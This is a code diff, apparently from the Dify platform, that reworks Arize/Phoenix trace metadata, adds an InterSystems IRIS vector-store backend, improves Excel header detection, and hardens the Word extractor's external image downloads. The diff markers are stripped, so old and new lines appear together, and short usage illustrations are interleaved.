@ -537,21 +590,23 @@ class ArizePhoenixDataTrace(BaseTraceInstance):
def dataset_retrieval_trace(self, trace_info: DatasetRetrievalTraceInfo):
if trace_info.message_data is None:
logger.warning("[Arize/Phoenix] Message data is None, skipping dataset retrieval trace.")
return
start_time = trace_info.start_time or trace_info.message_data.created_at
end_time = trace_info.end_time or trace_info.message_data.updated_at
metadata = {
"message_id": trace_info.message_id,
"tool_name": "dataset_retrieval",
"status": trace_info.message_data.status,
"status_message": trace_info.message_data.error or "",
"level": "ERROR" if trace_info.message_data.error else "DEFAULT",
"ls_provider": trace_info.message_data.model_provider or "",
"ls_model_name": trace_info.message_data.model_id or "",
}
metadata.update(trace_info.metadata)
metadata = wrap_span_metadata(
trace_info.metadata,
trace_id=trace_info.trace_id or "",
message_id=trace_info.message_id or "",
status=trace_info.message_data.status or "",
status_message=trace_info.error or "",
level="ERROR" if trace_info.error else "DEFAULT",
trace_entity_type="dataset_retrieval",
model_provider=trace_info.message_data.model_provider or "",
model_id=trace_info.message_data.model_id or "",
)
dify_trace_id = trace_info.trace_id or trace_info.message_id
self.ensure_root_span(dify_trace_id)
@ -560,20 +615,20 @@ class ArizePhoenixDataTrace(BaseTraceInstance):
span = self.tracer.start_span(
name=TraceTaskName.DATASET_RETRIEVAL_TRACE.value,
attributes={
SpanAttributes.INPUT_VALUE: json.dumps(trace_info.inputs, ensure_ascii=False),
SpanAttributes.OUTPUT_VALUE: json.dumps({"documents": trace_info.documents}, ensure_ascii=False),
SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.RETRIEVER.value,
SpanAttributes.METADATA: json.dumps(metadata, ensure_ascii=False),
"start_time": start_time.isoformat() if start_time else "",
"end_time": end_time.isoformat() if end_time else "",
SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.inputs),
SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value,
SpanAttributes.OUTPUT_VALUE: safe_json_dumps({"documents": trace_info.documents}),
SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value,
SpanAttributes.METADATA: safe_json_dumps(metadata),
},
start_time=datetime_to_nanos(start_time),
context=root_span_context,
)
try:
if trace_info.message_data.error:
set_span_status(span, trace_info.message_data.error)
if trace_info.error:
set_span_status(span, trace_info.error)
else:
set_span_status(span)
finally:
@ -584,30 +639,34 @@ class ArizePhoenixDataTrace(BaseTraceInstance):
logger.warning("[Arize/Phoenix] Message data is None, skipping tool trace.")
return
metadata = {
"message_id": trace_info.message_id,
"tool_config": json.dumps(trace_info.tool_config, ensure_ascii=False),
}
metadata = wrap_span_metadata(
trace_info.metadata,
trace_id=trace_info.trace_id or "",
message_id=trace_info.message_id or "",
status=trace_info.message_data.status or "",
status_message=trace_info.error or "",
level="ERROR" if trace_info.error else "DEFAULT",
trace_entity_type="tool",
tool_config=safe_json_dumps(trace_info.tool_config),
time_cost=trace_info.time_cost or 0,
file_url=trace_info.file_url or "",
)
dify_trace_id = trace_info.trace_id or trace_info.message_id
self.ensure_root_span(dify_trace_id)
root_span_context = self.propagator.extract(carrier=self.carrier)
tool_params_str = (
json.dumps(trace_info.tool_parameters, ensure_ascii=False)
if isinstance(trace_info.tool_parameters, dict)
else str(trace_info.tool_parameters)
)
span = self.tracer.start_span(
name=trace_info.tool_name,
attributes={
SpanAttributes.INPUT_VALUE: json.dumps(trace_info.tool_inputs, ensure_ascii=False),
SpanAttributes.OUTPUT_VALUE: trace_info.tool_outputs,
SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.TOOL.value,
SpanAttributes.METADATA: json.dumps(metadata, ensure_ascii=False),
SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.tool_inputs),
SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value,
SpanAttributes.OUTPUT_VALUE: trace_info.tool_outputs,
SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.TEXT.value,
SpanAttributes.METADATA: safe_json_dumps(metadata),
SpanAttributes.TOOL_NAME: trace_info.tool_name,
SpanAttributes.TOOL_PARAMETERS: tool_params_str,
SpanAttributes.TOOL_PARAMETERS: safe_json_dumps(trace_info.tool_parameters),
},
start_time=datetime_to_nanos(trace_info.start_time),
context=root_span_context,
@ -623,16 +682,22 @@ class ArizePhoenixDataTrace(BaseTraceInstance):
def generate_name_trace(self, trace_info: GenerateNameTraceInfo):
if trace_info.message_data is None:
logger.warning("[Arize/Phoenix] Message data is None, skipping generate name trace.")
return
metadata = {
"project_name": self.project,
"message_id": trace_info.message_id,
"status": trace_info.message_data.status,
"status_message": trace_info.message_data.error or "",
"level": "ERROR" if trace_info.message_data.error else "DEFAULT",
}
metadata.update(trace_info.metadata)
metadata = wrap_span_metadata(
trace_info.metadata,
trace_id=trace_info.trace_id or "",
message_id=trace_info.message_id or "",
status=trace_info.message_data.status or "",
status_message=trace_info.message_data.error or "",
level="ERROR" if trace_info.message_data.error else "DEFAULT",
trace_entity_type="generate_name",
model_provider=trace_info.message_data.model_provider or "",
model_id=trace_info.message_data.model_id or "",
conversation_id=trace_info.conversation_id or "",
tenant_id=trace_info.tenant_id,
)
dify_trace_id = trace_info.trace_id or trace_info.message_id or trace_info.conversation_id
self.ensure_root_span(dify_trace_id)
@ -641,13 +706,13 @@ class ArizePhoenixDataTrace(BaseTraceInstance):
span = self.tracer.start_span(
name=TraceTaskName.GENERATE_NAME_TRACE.value,
attributes={
SpanAttributes.INPUT_VALUE: json.dumps(trace_info.inputs, ensure_ascii=False),
SpanAttributes.OUTPUT_VALUE: json.dumps(trace_info.outputs, ensure_ascii=False),
SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.CHAIN.value,
SpanAttributes.METADATA: json.dumps(metadata, ensure_ascii=False),
SpanAttributes.SESSION_ID: trace_info.message_data.conversation_id,
"start_time": trace_info.start_time.isoformat() if trace_info.start_time else "",
"end_time": trace_info.end_time.isoformat() if trace_info.end_time else "",
SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.inputs),
SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value,
SpanAttributes.OUTPUT_VALUE: safe_json_dumps(trace_info.outputs),
SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value,
SpanAttributes.METADATA: safe_json_dumps(metadata),
SpanAttributes.SESSION_ID: trace_info.conversation_id or "",
},
start_time=datetime_to_nanos(trace_info.start_time),
context=root_span_context,
@ -688,32 +753,85 @@ class ArizePhoenixDataTrace(BaseTraceInstance):
raise ValueError(f"[Arize/Phoenix] API check failed: {str(e)}")
def get_project_url(self):
"""Build a redirect URL that forwards the user to the correct project for Arize/Phoenix."""
try:
if self.arize_phoenix_config.endpoint == "https://otlp.arize.com":
return "https://app.arize.com/"
else:
return f"{self.arize_phoenix_config.endpoint}/projects/"
project_name = self.arize_phoenix_config.project
endpoint = self.arize_phoenix_config.endpoint.rstrip("/")
# Arize
if isinstance(self.arize_phoenix_config, ArizeConfig):
return f"https://app.arize.com/?redirect_project_name={project_name}"
# Phoenix
return f"{endpoint}/projects/?redirect_project_name={project_name}"
except Exception as e:
logger.info("[Arize/Phoenix] Get run url failed: %s", str(e), exc_info=True)
raise ValueError(f"[Arize/Phoenix] Get run url failed: {str(e)}")
logger.info("[Arize/Phoenix] Failed to construct project URL: %s", str(e), exc_info=True)
raise ValueError(f"[Arize/Phoenix] Failed to construct project URL: {str(e)}")
def _construct_llm_attributes(self, prompts: dict | list | str | None) -> dict[str, str]:
"""Helper method to construct LLM attributes with passed prompts."""
attributes = {}
"""Construct LLM attributes with passed prompts for Arize/Phoenix."""
attributes: dict[str, str] = {}
def set_attribute(path: str, value: object) -> None:
"""Store an attribute safely as a string."""
if value is None:
return
try:
if isinstance(value, (dict, list)):
value = safe_json_dumps(value)
attributes[path] = str(value)
except Exception:
attributes[path] = str(value)
def set_message_attribute(message_index: int, key: str, value: object) -> None:
path = f"{SpanAttributes.LLM_INPUT_MESSAGES}.{message_index}.{key}"
set_attribute(path, value)
def set_tool_call_attributes(message_index: int, tool_index: int, tool_call: dict | object | None) -> None:
"""Extract and assign tool call details safely."""
if not tool_call:
return
def safe_get(obj, key, default=None):
if isinstance(obj, dict):
return obj.get(key, default)
return getattr(obj, key, default)
function_obj = safe_get(tool_call, "function", {})
function_name = safe_get(function_obj, "name", "")
function_args = safe_get(function_obj, "arguments", {})
call_id = safe_get(tool_call, "id", "")
base_path = (
f"{SpanAttributes.LLM_INPUT_MESSAGES}."
f"{message_index}.{MessageAttributes.MESSAGE_TOOL_CALLS}.{tool_index}"
)
set_attribute(f"{base_path}.{ToolCallAttributes.TOOL_CALL_FUNCTION_NAME}", function_name)
set_attribute(f"{base_path}.{ToolCallAttributes.TOOL_CALL_FUNCTION_ARGUMENTS_JSON}", function_args)
set_attribute(f"{base_path}.{ToolCallAttributes.TOOL_CALL_ID}", call_id)
# Handle list of messages
if isinstance(prompts, list):
for i, msg in enumerate(prompts):
if isinstance(msg, dict):
attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.{i}.message.content"] = msg.get("text", "")
attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.{i}.message.role"] = msg.get("role", "user")
# todo: handle assistant and tool role messages, as they don't always
# have a text field, but may have a tool_calls field instead
# e.g. 'tool_calls': [{'id': '98af3a29-b066-45a5-b4b1-46c74ddafc58',
# 'type': 'function', 'function': {'name': 'current_time', 'arguments': '{}'}}]}
elif isinstance(prompts, dict):
attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.0.message.content"] = json.dumps(prompts)
attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.0.message.role"] = "user"
elif isinstance(prompts, str):
attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.0.message.content"] = prompts
attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.0.message.role"] = "user"
for message_index, message in enumerate(prompts):
if not isinstance(message, dict):
continue
role = message.get("role", "user")
content = message.get("text") or message.get("content") or ""
set_message_attribute(message_index, MessageAttributes.MESSAGE_ROLE, role)
set_message_attribute(message_index, MessageAttributes.MESSAGE_CONTENT, content)
tool_calls = message.get("tool_calls") or []
if isinstance(tool_calls, list):
for tool_index, tool_call in enumerate(tool_calls):
set_tool_call_attributes(message_index, tool_index, tool_call)
# Handle single dict or plain string prompt
elif isinstance(prompts, (dict, str)):
set_message_attribute(0, MessageAttributes.MESSAGE_CONTENT, prompts)
set_message_attribute(0, MessageAttributes.MESSAGE_ROLE, "user")
return attributes
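An illustration of the flattened attributes the rewritten helper emits for a chat-style prompt list with a tool call; the exact keys come from openinference's SpanAttributes/MessageAttributes/ToolCallAttributes constants, so the literals in the comments are indicative only:

prompts = [
    {"role": "system", "text": "You are a helpful assistant."},
    {
        "role": "assistant",
        "content": "",
        "tool_calls": [
            {"id": "call_1", "type": "function", "function": {"name": "current_time", "arguments": "{}"}},
        ],
    },
]
# attributes = trace._construct_llm_attributes(prompts) would yield entries along the lines of:
#   llm.input_messages.0.message.role                                      -> "system"
#   llm.input_messages.0.message.content                                   -> "You are a helpful assistant."
#   llm.input_messages.1.message.tool_calls.0.tool_call.function.name      -> "current_time"
#   llm.input_messages.1.message.tool_calls.0.tool_call.function.arguments -> "{}"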

View File

@ -0,0 +1,407 @@
"""InterSystems IRIS vector database implementation for Dify.
This module provides vector storage and retrieval using IRIS native VECTOR type
with HNSW indexing for efficient similarity search.
"""
from __future__ import annotations
import json
import logging
import threading
import uuid
from contextlib import contextmanager
from typing import TYPE_CHECKING, Any
from configs import dify_config
from configs.middleware.vdb.iris_config import IrisVectorConfig
from core.rag.datasource.vdb.vector_base import BaseVector
from core.rag.datasource.vdb.vector_factory import AbstractVectorFactory
from core.rag.datasource.vdb.vector_type import VectorType
from core.rag.embedding.embedding_base import Embeddings
from core.rag.models.document import Document
from extensions.ext_redis import redis_client
from models.dataset import Dataset
if TYPE_CHECKING:
import iris
else:
try:
import iris
except ImportError:
iris = None # type: ignore[assignment]
logger = logging.getLogger(__name__)
# Singleton connection pool to minimize IRIS license usage
_pool_lock = threading.Lock()
_pool_instance: IrisConnectionPool | None = None
def get_iris_pool(config: IrisVectorConfig) -> IrisConnectionPool:
"""Get or create the global IRIS connection pool (singleton pattern)."""
global _pool_instance # pylint: disable=global-statement
with _pool_lock:
if _pool_instance is None:
logger.info("Initializing IRIS connection pool")
_pool_instance = IrisConnectionPool(config)
return _pool_instance
class IrisConnectionPool:
"""Thread-safe connection pool for IRIS database."""
def __init__(self, config: IrisVectorConfig) -> None:
self.config = config
self._pool: list[Any] = []
self._lock = threading.Lock()
self._min_size = config.IRIS_MIN_CONNECTION
self._max_size = config.IRIS_MAX_CONNECTION
self._in_use = 0
self._schemas_initialized: set[str] = set() # Cache for initialized schemas
self._initialize_pool()
def _initialize_pool(self) -> None:
for _ in range(self._min_size):
self._pool.append(self._create_connection())
def _create_connection(self) -> Any:
return iris.connect(
hostname=self.config.IRIS_HOST,
port=self.config.IRIS_SUPER_SERVER_PORT,
namespace=self.config.IRIS_DATABASE,
username=self.config.IRIS_USER,
password=self.config.IRIS_PASSWORD,
)
def get_connection(self) -> Any:
"""Get a connection from pool or create new if available."""
with self._lock:
if self._pool:
conn = self._pool.pop()
self._in_use += 1
return conn
if self._in_use < self._max_size:
conn = self._create_connection()
self._in_use += 1
return conn
raise RuntimeError("Connection pool exhausted")
def return_connection(self, conn: Any) -> None:
"""Return connection to pool after validating it."""
if not conn:
return
# Validate connection health
is_valid = False
try:
cursor = conn.cursor()
cursor.execute("SELECT 1")
cursor.close()
is_valid = True
except (OSError, RuntimeError) as e:
logger.debug("Connection validation failed: %s", e)
try:
conn.close()
except (OSError, RuntimeError):
pass
with self._lock:
self._pool.append(conn if is_valid else self._create_connection())
self._in_use -= 1
def ensure_schema_exists(self, schema: str) -> None:
"""Ensure schema exists in IRIS database.
This method is idempotent and thread-safe. It uses a memory cache to avoid
redundant database queries for already-verified schemas.
Args:
schema: Schema name to ensure exists
Raises:
Exception: If schema creation fails
"""
# Fast path: check cache first (no lock needed for read-only set lookup)
if schema in self._schemas_initialized:
return
# Slow path: acquire lock and check again (double-checked locking)
with self._lock:
if schema in self._schemas_initialized:
return
# Get a connection to check/create schema
conn = self._pool[0] if self._pool else self._create_connection()
cursor = conn.cursor()
try:
# Check if schema exists using INFORMATION_SCHEMA
check_sql = """
SELECT COUNT(*) FROM INFORMATION_SCHEMA.SCHEMATA
WHERE SCHEMA_NAME = ?
"""
cursor.execute(check_sql, (schema,)) # Must be tuple or list
exists = cursor.fetchone()[0] > 0
if not exists:
# Schema doesn't exist, create it
cursor.execute(f"CREATE SCHEMA {schema}")
conn.commit()
logger.info("Created schema: %s", schema)
else:
logger.debug("Schema already exists: %s", schema)
# Add to cache to skip future checks
self._schemas_initialized.add(schema)
except Exception as e:
conn.rollback()
logger.exception("Failed to ensure schema %s exists", schema)
raise
finally:
cursor.close()
def close_all(self) -> None:
"""Close all connections (application shutdown only)."""
with self._lock:
for conn in self._pool:
try:
conn.close()
except (OSError, RuntimeError):
pass
self._pool.clear()
self._in_use = 0
self._schemas_initialized.clear()
class IrisVector(BaseVector):
"""IRIS vector database implementation using native VECTOR type and HNSW indexing."""
def __init__(self, collection_name: str, config: IrisVectorConfig) -> None:
super().__init__(collection_name)
self.config = config
self.table_name = f"embedding_{collection_name}".upper()
self.schema = config.IRIS_SCHEMA or "dify"
self.pool = get_iris_pool(config)
def get_type(self) -> str:
return VectorType.IRIS
@contextmanager
def _get_cursor(self):
"""Context manager for database cursor with connection pooling."""
conn = self.pool.get_connection()
cursor = conn.cursor()
try:
yield cursor
conn.commit()
except Exception:
conn.rollback()
raise
finally:
cursor.close()
self.pool.return_connection(conn)
def create(self, texts: list[Document], embeddings: list[list[float]], **kwargs) -> list[str]:
dimension = len(embeddings[0])
self._create_collection(dimension)
return self.add_texts(texts, embeddings)
def add_texts(self, documents: list[Document], embeddings: list[list[float]], **_kwargs) -> list[str]:
"""Add documents with embeddings to the collection."""
added_ids = []
with self._get_cursor() as cursor:
for i, doc in enumerate(documents):
doc_id = doc.metadata.get("doc_id", str(uuid.uuid4())) if doc.metadata else str(uuid.uuid4())
metadata = json.dumps(doc.metadata) if doc.metadata else "{}"
embedding_str = json.dumps(embeddings[i])
sql = f"INSERT INTO {self.schema}.{self.table_name} (id, text, meta, embedding) VALUES (?, ?, ?, ?)"
cursor.execute(sql, (doc_id, doc.page_content, metadata, embedding_str))
added_ids.append(doc_id)
return added_ids
def text_exists(self, id: str) -> bool: # pylint: disable=redefined-builtin
try:
with self._get_cursor() as cursor:
sql = f"SELECT 1 FROM {self.schema}.{self.table_name} WHERE id = ?"
cursor.execute(sql, (id,))
return cursor.fetchone() is not None
except (OSError, RuntimeError, ValueError):
return False
def delete_by_ids(self, ids: list[str]) -> None:
if not ids:
return
with self._get_cursor() as cursor:
placeholders = ",".join(["?" for _ in ids])
sql = f"DELETE FROM {self.schema}.{self.table_name} WHERE id IN ({placeholders})"
cursor.execute(sql, ids)
def delete_by_metadata_field(self, key: str, value: str) -> None:
"""Delete documents by metadata field (JSON LIKE pattern matching)."""
with self._get_cursor() as cursor:
pattern = f'%"{key}": "{value}"%'
sql = f"DELETE FROM {self.schema}.{self.table_name} WHERE meta LIKE ?"
cursor.execute(sql, (pattern,))
def search_by_vector(self, query_vector: list[float], **kwargs: Any) -> list[Document]:
"""Search similar documents using VECTOR_COSINE with HNSW index."""
top_k = kwargs.get("top_k", 4)
score_threshold = float(kwargs.get("score_threshold") or 0.0)
embedding_str = json.dumps(query_vector)
with self._get_cursor() as cursor:
sql = f"""
SELECT TOP {top_k} id, text, meta, VECTOR_COSINE(embedding, ?) as score
FROM {self.schema}.{self.table_name}
ORDER BY score DESC
"""
cursor.execute(sql, (embedding_str,))
docs = []
for row in cursor.fetchall():
if len(row) >= 4:
text, meta_str, score = row[1], row[2], float(row[3])
if score >= score_threshold:
metadata = json.loads(meta_str) if meta_str else {}
metadata["score"] = score
docs.append(Document(page_content=text, metadata=metadata))
return docs
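A hedged end-to-end sketch of a similarity search against an existing collection; it assumes the intersystems-irispython driver is installed, an IRIS instance is reachable, and that IrisVectorConfig accepts the same fields the factory below passes (all values are placeholders):

config = IrisVectorConfig(
    IRIS_HOST="localhost",
    IRIS_SUPER_SERVER_PORT=1972,          # default IRIS superserver port
    IRIS_USER="_SYSTEM",
    IRIS_PASSWORD="SYS",
    IRIS_DATABASE="USER",
    IRIS_SCHEMA="dify",
    IRIS_CONNECTION_URL=None,
    IRIS_MIN_CONNECTION=1,
    IRIS_MAX_CONNECTION=5,
    IRIS_TEXT_INDEX=False,
    IRIS_TEXT_INDEX_LANGUAGE="en",
)
vector = IrisVector(collection_name="dataset_abc123", config=config)
docs = vector.search_by_vector([0.1] * 768, top_k=4, score_threshold=0.2)
for doc in docs:
    print(doc.metadata["score"], doc.page_content[:80])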
def search_by_full_text(self, query: str, **kwargs: Any) -> list[Document]:
"""Search documents by full-text using iFind index or fallback to LIKE search."""
top_k = kwargs.get("top_k", 5)
with self._get_cursor() as cursor:
if self.config.IRIS_TEXT_INDEX:
# Use iFind full-text search with index
text_index_name = f"idx_{self.table_name}_text"
sql = f"""
SELECT TOP {top_k} id, text, meta
FROM {self.schema}.{self.table_name}
WHERE %ID %FIND search_index({text_index_name}, ?)
"""
cursor.execute(sql, (query,))
else:
# Fallback to LIKE search (inefficient for large datasets)
query_pattern = f"%{query}%"
sql = f"""
SELECT TOP {top_k} id, text, meta
FROM {self.schema}.{self.table_name}
WHERE text LIKE ?
"""
cursor.execute(sql, (query_pattern,))
docs = []
for row in cursor.fetchall():
if len(row) >= 3:
metadata = json.loads(row[2]) if row[2] else {}
docs.append(Document(page_content=row[1], metadata=metadata))
if not docs:
logger.info("Full-text search for '%s' returned no results", query)
return docs
def delete(self) -> None:
"""Delete the entire collection (drop table - permanent)."""
with self._get_cursor() as cursor:
sql = f"DROP TABLE {self.schema}.{self.table_name}"
cursor.execute(sql)
def _create_collection(self, dimension: int) -> None:
"""Create table with VECTOR column and HNSW index.
Uses Redis lock to prevent concurrent creation attempts across multiple
API server instances (api, worker, worker_beat).
"""
cache_key = f"vector_indexing_{self._collection_name}"
lock_name = f"{cache_key}_lock"
with redis_client.lock(lock_name, timeout=20): # pylint: disable=not-context-manager
if redis_client.get(cache_key):
return
# Ensure schema exists (idempotent, cached after first call)
self.pool.ensure_schema_exists(self.schema)
with self._get_cursor() as cursor:
# Create table with VECTOR column
sql = f"""
CREATE TABLE {self.schema}.{self.table_name} (
id VARCHAR(255) PRIMARY KEY,
text CLOB,
meta CLOB,
embedding VECTOR(DOUBLE, {dimension})
)
"""
logger.info("Creating table: %s.%s", self.schema, self.table_name)
cursor.execute(sql)
# Create HNSW index for vector similarity search
index_name = f"idx_{self.table_name}_embedding"
sql_index = (
f"CREATE INDEX {index_name} ON {self.schema}.{self.table_name} "
"(embedding) AS HNSW(Distance='Cosine')"
)
logger.info("Creating HNSW index: %s", index_name)
cursor.execute(sql_index)
logger.info("HNSW index created successfully: %s", index_name)
# Create full-text search index if enabled
logger.info(
"IRIS_TEXT_INDEX config value: %s (type: %s)",
self.config.IRIS_TEXT_INDEX,
type(self.config.IRIS_TEXT_INDEX),
)
if self.config.IRIS_TEXT_INDEX:
text_index_name = f"idx_{self.table_name}_text"
language = self.config.IRIS_TEXT_INDEX_LANGUAGE
# Fixed: Removed extra parentheses and corrected syntax
sql_text_index = f"""
CREATE INDEX {text_index_name} ON {self.schema}.{self.table_name} (text)
AS %iFind.Index.Basic
(LANGUAGE = '{language}', LOWER = 1, INDEXOPTION = 0)
"""
logger.info("Creating text index: %s with language: %s", text_index_name, language)
logger.info("SQL for text index: %s", sql_text_index)
cursor.execute(sql_text_index)
logger.info("Text index created successfully: %s", text_index_name)
else:
logger.warning("Text index creation skipped - IRIS_TEXT_INDEX is disabled")
redis_client.set(cache_key, 1, ex=3600)
class IrisVectorFactory(AbstractVectorFactory):
"""Factory for creating IrisVector instances."""
def init_vector(self, dataset: Dataset, attributes: list, embeddings: Embeddings) -> IrisVector:
if dataset.index_struct_dict:
class_prefix: str = dataset.index_struct_dict["vector_store"]["class_prefix"]
collection_name = class_prefix
else:
dataset_id = dataset.id
collection_name = Dataset.gen_collection_name_by_id(dataset_id)
index_struct_dict = self.gen_index_struct_dict(VectorType.IRIS, collection_name)
dataset.index_struct = json.dumps(index_struct_dict)
return IrisVector(
collection_name=collection_name,
config=IrisVectorConfig(
IRIS_HOST=dify_config.IRIS_HOST,
IRIS_SUPER_SERVER_PORT=dify_config.IRIS_SUPER_SERVER_PORT,
IRIS_USER=dify_config.IRIS_USER,
IRIS_PASSWORD=dify_config.IRIS_PASSWORD,
IRIS_DATABASE=dify_config.IRIS_DATABASE,
IRIS_SCHEMA=dify_config.IRIS_SCHEMA,
IRIS_CONNECTION_URL=dify_config.IRIS_CONNECTION_URL,
IRIS_MIN_CONNECTION=dify_config.IRIS_MIN_CONNECTION,
IRIS_MAX_CONNECTION=dify_config.IRIS_MAX_CONNECTION,
IRIS_TEXT_INDEX=dify_config.IRIS_TEXT_INDEX,
IRIS_TEXT_INDEX_LANGUAGE=dify_config.IRIS_TEXT_INDEX_LANGUAGE,
),
)

View File

@ -187,6 +187,10 @@ class Vector:
from core.rag.datasource.vdb.clickzetta.clickzetta_vector import ClickzettaVectorFactory
return ClickzettaVectorFactory
case VectorType.IRIS:
from core.rag.datasource.vdb.iris.iris_vector import IrisVectorFactory
return IrisVectorFactory
case _:
raise ValueError(f"Vector store {vector_type} is not supported.")

View File

@ -32,3 +32,4 @@ class VectorType(StrEnum):
HUAWEI_CLOUD = "huawei_cloud"
MATRIXONE = "matrixone"
CLICKZETTA = "clickzetta"
IRIS = "iris"

View File

@ -1,7 +1,7 @@
"""Abstract interface for document loader implementations."""
import os
from typing import cast
from typing import TypedDict
import pandas as pd
from openpyxl import load_workbook
@ -10,6 +10,12 @@ from core.rag.extractor.extractor_base import BaseExtractor
from core.rag.models.document import Document
class Candidate(TypedDict):
idx: int
count: int
map: dict[int, str]
class ExcelExtractor(BaseExtractor):
"""Load Excel files.
@ -30,32 +36,38 @@ class ExcelExtractor(BaseExtractor):
file_extension = os.path.splitext(self._file_path)[-1].lower()
if file_extension == ".xlsx":
wb = load_workbook(self._file_path, data_only=True)
for sheet_name in wb.sheetnames:
sheet = wb[sheet_name]
data = sheet.values
cols = next(data, None)
if cols is None:
continue
df = pd.DataFrame(data, columns=cols)
df.dropna(how="all", inplace=True)
for index, row in df.iterrows():
page_content = []
for col_index, (k, v) in enumerate(row.items()):
if pd.notna(v):
cell = sheet.cell(
row=cast(int, index) + 2, column=col_index + 1
) # +2 to account for header and 1-based index
if cell.hyperlink:
value = f"[{v}]({cell.hyperlink.target})"
page_content.append(f'"{k}":"{value}"')
else:
page_content.append(f'"{k}":"{v}"')
documents.append(
Document(page_content=";".join(page_content), metadata={"source": self._file_path})
)
wb = load_workbook(self._file_path, read_only=True, data_only=True)
try:
for sheet_name in wb.sheetnames:
sheet = wb[sheet_name]
header_row_idx, column_map, max_col_idx = self._find_header_and_columns(sheet)
if not column_map:
continue
start_row = header_row_idx + 1
for row in sheet.iter_rows(min_row=start_row, max_col=max_col_idx, values_only=False):
if all(cell.value is None for cell in row):
continue
page_content = []
for col_idx, cell in enumerate(row):
value = cell.value
if col_idx in column_map:
col_name = column_map[col_idx]
if hasattr(cell, "hyperlink") and cell.hyperlink:
target = getattr(cell.hyperlink, "target", None)
if target:
value = f"[{value}]({target})"
if value is None:
value = ""
elif not isinstance(value, str):
value = str(value)
value = value.strip().replace('"', '\\"')
page_content.append(f'"{col_name}":"{value}"')
if page_content:
documents.append(
Document(page_content=";".join(page_content), metadata={"source": self._file_path})
)
finally:
wb.close()
elif file_extension == ".xls":
excel_file = pd.ExcelFile(self._file_path, engine="xlrd")
@ -63,9 +75,9 @@ class ExcelExtractor(BaseExtractor):
df = excel_file.parse(sheet_name=excel_sheet_name)
df.dropna(how="all", inplace=True)
for _, row in df.iterrows():
for _, series_row in df.iterrows():
page_content = []
for k, v in row.items():
for k, v in series_row.items():
if pd.notna(v):
page_content.append(f'"{k}":"{v}"')
documents.append(
@ -75,3 +87,61 @@ class ExcelExtractor(BaseExtractor):
raise ValueError(f"Unsupported file extension: {file_extension}")
return documents
def _find_header_and_columns(self, sheet, scan_rows=10) -> tuple[int, dict[int, str], int]:
"""
Scan first N rows to find the most likely header row.
Returns:
header_row_idx: 1-based index of the header row
column_map: Dict mapping 0-based column index to column name
max_col_idx: 1-based index of the last valid column (for iter_rows boundary)
"""
# Store potential candidates: (row_index, non_empty_count, column_map)
candidates: list[Candidate] = []
# Limit scan to avoid performance issues on huge files
# We iterate manually to control the read scope
for current_row_idx, row in enumerate(sheet.iter_rows(min_row=1, max_row=scan_rows, values_only=True), start=1):
# Filter out empty cells and build a temp map for this row
# col_idx is 0-based
row_map = {}
for col_idx, cell_value in enumerate(row):
if cell_value is not None and str(cell_value).strip():
row_map[col_idx] = str(cell_value).strip().replace('"', '\\"')
if not row_map:
continue
non_empty_count = len(row_map)
# Header selection heuristic (implemented):
# - Prefer the first row with at least 2 non-empty columns.
# - Fallback: choose the row with the most non-empty columns
# (tie-breaker: smaller row index).
candidates.append({"idx": current_row_idx, "count": non_empty_count, "map": row_map})
if not candidates:
return 0, {}, 0
# Choose the best candidate header row.
best_candidate: Candidate | None = None
# Strategy: prefer the first row with >= 2 non-empty columns; otherwise fallback.
for cand in candidates:
if cand["count"] >= 2:
best_candidate = cand
break
# Fallback: if no row has >= 2 columns, or all have 1, just take the one with max columns
if not best_candidate:
# Sort by count desc, then index asc
candidates.sort(key=lambda x: (-x["count"], x["idx"]))
best_candidate = candidates[0]
# Determine max_col_idx (1-based for openpyxl)
# It is the index of the last valid column in our map + 1
max_col_idx = max(best_candidate["map"].keys()) + 1
return best_candidate["idx"], best_candidate["map"], max_col_idx
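The header heuristic can be exercised in isolation; a sketch over plain tuples rather than openpyxl cells (the title row is skipped because it has only one non-empty cell):

rows = [
    ("Monthly Report", None, None),      # title row: 1 non-empty cell
    ("Name", "Email", "Score"),          # first row with >= 2 columns -> chosen as header
    ("Alice", "alice@example.com", 98),
]
candidates = []
for idx, row in enumerate(rows, start=1):
    row_map = {i: str(v).strip() for i, v in enumerate(row) if v is not None and str(v).strip()}
    if row_map:
        candidates.append({"idx": idx, "count": len(row_map), "map": row_map})

best = next((c for c in candidates if c["count"] >= 2), None)
if best is None:
    best = sorted(candidates, key=lambda c: (-c["count"], c["idx"]))[0]
print(best["idx"], best["map"])  # 2 {0: 'Name', 1: 'Email', 2: 'Score'}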

View File

@ -84,22 +84,45 @@ class WordExtractor(BaseExtractor):
image_count = 0
image_map = {}
for rel in doc.part.rels.values():
for r_id, rel in doc.part.rels.items():
if "image" in rel.target_ref:
image_count += 1
if rel.is_external:
url = rel.target_ref
response = ssrf_proxy.get(url)
if not self._is_valid_url(url):
continue
try:
response = ssrf_proxy.get(url)
except Exception as e:
logger.warning("Failed to download image from URL: %s: %s", url, str(e))
continue
if response.status_code == 200:
image_ext = mimetypes.guess_extension(response.headers["Content-Type"])
image_ext = mimetypes.guess_extension(response.headers.get("Content-Type", ""))
if image_ext is None:
continue
file_uuid = str(uuid.uuid4())
file_key = "image_files/" + self.tenant_id + "/" + file_uuid + "." + image_ext
file_key = "image_files/" + self.tenant_id + "/" + file_uuid + image_ext
mime_type, _ = mimetypes.guess_type(file_key)
storage.save(file_key, response.content)
else:
continue
# save file to db
upload_file = UploadFile(
tenant_id=self.tenant_id,
